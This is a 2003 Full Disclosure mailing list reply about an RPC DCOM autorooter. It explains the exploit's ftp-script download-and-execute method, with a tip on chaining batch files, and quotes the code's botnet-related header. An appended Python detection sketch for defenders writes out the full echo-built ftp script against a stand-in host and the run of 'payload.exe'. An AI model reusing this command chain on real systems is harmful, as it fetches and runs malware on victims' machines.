Full Disclosure mailing list archives
Re: DCOM Worm/scanner/autorooter !!!
From: Joey <joey2cool () yahoo com>
Date: Sun, 10 Aug 2003 03:49:42 -0700 (PDT)
I looked at the code and it is NOT a worm. It can be deployed on several computers very fast, but it doesn't have the ability to replicate itself from the target computer. Basically, this exploit sends a command to create a script for ftp.exe, which it calls by using "ftp -s scriptfile". The script contains the hostname, username, password, and file to download. Then it runs the file after it's done downloading. This can easily be modified to run multiple commands. You can set it to download a self-extracting rar/zip file and then run a batch file contained inside the SFX file after it's done extracting.

There is a very fine line between proof of concept code and worms. Worms are highly illegal and if you publish the code you can be held responsible, so make sure you are aware of this when posting here. This exploit is NOT a worm but the potential for it to be a worm is there...

--- roman.kunz () juliusbaer com wrote:
hi folks,

already saw a re-edited one which has only two targets (just as the last sploit by k-otik).

<cut>
/* RPC DCOM WORM v 2.3 -
 * originally by volkam, fixed and beefed by uv/graff
 * even more original concept by LSD-pl.net
 * original code by HDM
 *
 * --
 * This code is in relation to a specific DDOS IRCD botnet project.
 * You may edit the code, and define which ftp to login
 * and which .exeutable file to recieve and run.
 * I use spybot, very convienent
 * -
 * So basicly script kids and brazilian children, this is useless to you
 *
 * -
 * shouts: darksyn - true homie , giver of 0d4yz, and testbeds
 * volkam - top sekret agent man
 * ntfx - master pupil
 * jpahk - true homie #2
 * k3r0m - made that shit universal (2 targets WinXP - Win2k)
 *
 * Legion2000 Security Research (c) 2003
 * -
 * enjoy!
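Added example, not part of the original post or of the code it discusses: a detection sketch for the behaviour described in the message above (a script file built for ftp.exe, ftp run with -s against it, then the downloaded file executed). The event format, file names and host name are constructed assumptions; the regex accepts both the "-s file" form quoted in the post and the "-s:file" form.

```python
import re

# "echo <text> > file" or ">> file": how a script file gets built line by line.
ECHO_REDIRECT = re.compile(r"\becho\s+(?P<text>.*?)\s*>{1,2}\s*(?P<file>\S+)", re.I)
# ftp driven non-interactively from a script file: "ftp -s:file" or "ftp -s file".
FTP_SCRIPT = re.compile(r"\bftp(?:\.exe)?\s+(?:\S+\s+)*?-s[:\s]\s*(?P<file>\S+)", re.I)
GET_LINE = re.compile(r"^\s*(?:get|recv)\s+(?P<file>\S+)", re.I)
CMD_PREFIX = re.compile(r"^\s*cmd(?:\.exe)?\s+/c\s+", re.I)

# Constructed process-creation records (timestamp, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("00:00:01", "cmd.exe /c echo open ftp.example.invalid> x.txt"),
    ("00:00:01", "cmd.exe /c echo USERNAME>> x.txt & echo PASSWORD>> x.txt"),
    ("00:00:02", "cmd.exe /c echo get payload.exe>> x.txt & echo bye>> x.txt"),
    ("00:00:03", "cmd.exe /c ftp -s:x.txt"),
    ("00:00:09", "cmd.exe /c payload.exe"),
    ("00:05:00", "ftp ftp.example.invalid"),  # interactive use, should not alert
]

def detect(events):
    """Return (timestamp, rule, detail) alerts for the echo -> ftp -s -> run chain."""
    scripts, fetched, alerts = {}, set(), []
    for ts, cmdline in events:
        # Drop a leading "cmd /c" and look at each "&"-chained command separately.
        for part in re.split(r"\s*&+\s*", CMD_PREFIX.sub("", cmdline)):
            echo = ECHO_REDIRECT.search(part)
            ftp = FTP_SCRIPT.search(part)
            tokens = part.split()
            if echo:
                # Remember what was written into which file.
                scripts.setdefault(echo["file"].lower(), []).append(echo["text"])
            elif ftp:
                name = ftp["file"].lower()
                lines = scripts.get(name, [])
                for line in lines:
                    got = GET_LINE.match(line)
                    if got:
                        fetched.add(got["file"].lower())  # file the script downloads
                rule = "ftp-script-echo-built" if lines else "ftp-script"
                alerts.append((ts, rule, name))
            elif tokens and tokens[0].lower() in fetched:
                alerts.append((ts, "downloaded-file-run", tokens[0].lower()))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```
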